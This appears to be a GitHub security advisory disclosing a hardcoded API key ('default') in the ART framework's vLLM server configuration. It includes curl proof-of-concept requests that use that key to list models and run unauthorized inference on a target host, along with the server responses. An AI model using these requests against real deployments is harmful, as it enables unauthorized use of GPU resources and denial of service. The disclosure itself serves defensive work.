-
Notifications
You must be signed in to change notification settings - Fork 776
Description
Advisory Details
Title: Hardcoded API Key in vLLM Server Configuration Allows Authentication Bypass
Description:
Summary
A hardcoded credential vulnerability exists in the ART framework's vLLM server configuration generator. The framework unconditionally initializes the built-in vLLM OpenAI-compatible server with a default API key set to "default". This allows any unauthenticated user with network access to the service to bypass authentication, consume LLM inference resources, and query sensitive model deployment information.
Details
In src/art/dev/openai_server.py, the get_openai_server_config function is responsible for orchestrating the setup of the internal vLLM server. The ServerArgs data structure is instantiated with a hardcoded api_key="default".
Because this API key is statically assigned and passed to the vLLM engine at startup without automatically generating a secure random token or enforcing a required user-defined key, the vLLM server's internal authentication middleware consistently accepts Authorization: Bearer default for all incoming REST API requests.
PoC
-
Deploy the ART framework and start a local model service (e.g., via the LocalBackend or CLI), which exposes the vLLM HTTP API on a listening port (e.g.,
8000). -
Step 1 — Confirm auth bypass (list models with hardcoded key):
curl -s http://<target>:8000/v1/models \
-H "Authorization: Bearer default" | python3 -m json.tool- Step 2 — Demonstrate actual harm (unauthorized inference / GPU resource theft):
curl -s http://<target>:8000/v1/chat/completions \
-H "Authorization: Bearer default" \
-H "Content-Type: application/json" \
-d '{
"model": "Qwen/Qwen1.5-0.5B",
"messages": [{"role": "user", "content": "What is the capital of France?"}],
"max_tokens": 64
}' | python3 -m json.tool- Step 3 — Negative test (wrong key is correctly rejected, proving auth middleware is active):
curl -i http://<target>:8000/v1/models \
-H "Authorization: Bearer wrong-key"Log of Evidence
Step 1 — Auth bypass succeeds (model listing):
{
"object": "list",
"data": [
{
"id": "Qwen/Qwen1.5-0.5B",
"object": "model",
"created": 1774020077,
"owned_by": "organization",
"permission": []
}
]
}
Step 2 — Unauthorized inference succeeds (GPU resource theft):
{
"id": "chatcmpl-583d9a951ae8",
"object": "chat.completion",
"created": 1774020077,
"model": "Qwen/Qwen1.5-0.5B",
"choices": [
{
"index": 0,
"message": {
"role": "assistant",
"content": "The capital of France is Paris..."
},
"finish_reason": "stop"
}
],
"usage": {
"prompt_tokens": 30,
"completion_tokens": 36,
"total_tokens": 66
}
}
The model processed the attacker's prompt and returned a valid inference result, proving the attacker can consume GPU compute resources at will without any legitimate credentials.
Step 3 — Wrong key is rejected (auth middleware is active):
HTTP/1.1 401 Unauthorized
content-type: application/json
{"error":{"message":"Unauthorized","type":"invalid_api_key"}}
This confirms the authentication mechanism is present and functioning — the vulnerability is specifically that the API key is hardcoded to a predictable value ("default"), not that authentication is missing.
Impact
This is an Improper Authentication / Use of Hardcoded Credentials vulnerability. Any attacker able to route traffic to the listening port can entirely bypass the API authentication layer to make arbitrary LLM inference requests. This leads to severe resource exhaustion, financial quota depletion, Denial of Service (DoS) by maxing out GPU computation capabilities, and potential unauthorized reconnaissance of hosted models.
Affected products
- Ecosystem: python
- Package name: art
- Affected versions: <= latest
- Patched versions:
Severity
- Severity: High
- Vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H
Weaknesses
- CWE: CWE-798: Use of Hard-coded Credentials
Occurrences
| Permalink | Description |
|---|---|
| https://github.com/OpenPipe/ART/blob/main/src/art/dev/openai_server.py#L30 | The ServerArgs initialization forcefully sets api_key="default", causing the deployed vLLM instance to blindly accept this default key for all privileged API interactions. |